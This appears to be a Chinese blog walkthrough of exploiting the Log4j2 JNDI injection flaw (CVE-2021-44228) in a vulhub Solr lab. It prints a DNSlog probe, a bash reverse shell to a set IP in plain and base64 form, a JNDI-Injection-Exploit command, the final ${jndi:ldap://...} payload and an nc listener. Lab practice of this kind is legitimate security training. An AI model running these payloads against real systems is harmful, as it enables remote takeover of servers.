首页 > 其他分享 >Log4j2漏洞

Log4j2漏洞

时间:2024-12-24 21:29:27浏览次数:10  
标签:java JNDI base64 jar 漏洞 Injection Log4j2 bash

第一步:搭建靶场环境

#开启环境
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d

来到网站首页

第二步:搭建一个dnslog平台上获取我们注入的效果

第三步:发现 /solr/admin/cores?action= 这里有个参数可以传

我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的 版本号

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.kq25rl.dnslog.cn}

第四步:开始反弹shell

#需要用到一个工具JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
#安装java
yum install java
#反弹shell
bash -i >& /dev/tcp/[IP]/[端口] 0>&1
bash -i >& /dev/tcp/8.155.7.133/8888 0>&1
#反弹shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy84ODg4IDA+JjE=
#命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]
#最终命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "8.155.7.133"
#注释
-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址。

第五步:进行JNDI注入

#新建终端并开启服务器监听
nc -lvvp 8888

第六步:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址

/solr/admin/cores?action=${jndi:ldap://8.155.7.133:1389/1niv1a}
${jndi:ldap://8.155.7.133:1389/1niv1a}

看到已经访问进来了

去监听端口的页面成功反弹Shell

标签:java,JNDI,base64,jar,漏洞,Injection,Log4j2,bash
From: https://blog.csdn.net/m0_73639338/article/details/144702118

相关文章

  • Apache Log4j漏洞复现
    所用环境宝塔云服务器log4j2是Apache的⼀个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。apachelog4j通过定义每⼀条日志信息的级别能够更加细致地控制日志⽣成地过程,受影响地版本中纯在JNDI注入漏洞,导致......
  • Vnlhun靶场Log4j2漏洞
    相关概念log4j2是Apache的⼀个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞漏洞原理简单说就是当你使⽤log4j2中提供的⽅法去输出⽇志信息时,⽐如说最常⻅的:Stringa="变量输⼊"JNDI注入介绍JNDI,中⽂名叫j......
  • 漏洞扫描:网络安全的 “体检” 与 “防护指南”
    在当今数字化时代,网络安全如同守护城堡的坚固城墙,而漏洞扫描则是检查城墙是否存在缝隙与薄弱环节的重要手段。那么,究竟什么是漏洞扫描?又该如何进行呢?什么是漏洞扫描?漏洞扫描是一种安全检测过程,旨在识别计算机系统、网络或应用程序中的安全漏洞。这些漏洞可能被恶意用户利用以获......
  • 【网络安全渗透测试零基础入门】之什么是文件包含漏洞&分类(非常详细)收藏这一篇就够了!
    一、前言大家好,我是强哥今天主要给大家讲解一下什么是文件包含漏洞、本地文件包含漏洞喜欢的朋友们,记得给我点赞支持和收藏一下,关注我,学习黑客技术。一、什么是文件包含漏洞1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入......
  • CTFHub中web里的rrsf漏洞实战思路
    1.内网访问先来看要求:要求我们访问网址里的flag.php尝试访问下百度,发现可以访问直接访问127.0.0.1下的flag.php文件提交flag,解决内网访问2.伪协议读取文件先看题目要求,要求访问web目录下的文件使用file协议进行访问发现可以访问到,但是没有想要的内容,我们查看源代码将......
  • 文件上传漏洞实战
    1.hackme靶场实战进入到kali虚拟机,同时进入漏洞虚拟机,目录扫描kali虚拟机,扫描到靶机IP地址,进入到页面注册账号并登录页面,验证sql注入,得到MD5加密的编码,使用工具解码得到账号和密码为superadmin:Uncrackable登录账号,上传一个一句话木马的php文件御剑扫描得到一个upl......
  • 文件解析漏洞靶场实战
    1.IIS6.X安装windows2003和IIS6.X环境,进入inetpub/wwwroot目录下,创建一个.asp后缀的文件创建一个后缀为.jpg的文件,写入一句话,显示当前时间查看IP地址,在浏览器访问.jpg文件2.IIS7.X开启IIS7.X,并修改php.ini里面的配置文件修改windows系统中的IIS服务,并重启PHPstudy......
  • 【安全工具】Web漏洞扫描十大工具(非常详细),零基础入门到精通,看这一篇就够了
    文章目录漏洞扫描十大工具AwVSNexposeOpenVASWebScarabWebInspectWhisker/libwhiskerBurpsuiteWiktoWatchfireAppScanN-StealthNmapp0fISSNessusXprobe文末福利漏洞扫描十大工具AwVSAwVS是一款知名的Web网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行......
  • 【2024最新黑客工具分享】TPscan - 一键ThinkPHP漏洞检测getshell
    0x00工具介绍TPscan是一款基于Python3的ThinkPHP漏洞检测工具。0x01下载链接TPscan下载链接:夸克网盘分享0x02功能介绍thinkphp_checkcode_time_sqli_verifythinkphp_construct_code_exec_verifythinkphp_construct_debug_rce_verifythinkphp_debug_index_......
  • niushop开源商城靶场------漏洞检测攻略
    一,搭建靶场把安装包放到小p的根目录里打开小皮的apache和MySQL服务打开浏览器访问http://127.0.0.1/bachangone/niushop-master/安装靶场二,访问首页、安装完会有跳转,可以直接打开首页和后台http://127.0.0.1/bachangone/niushop-master/index.php打开之后先注册一个......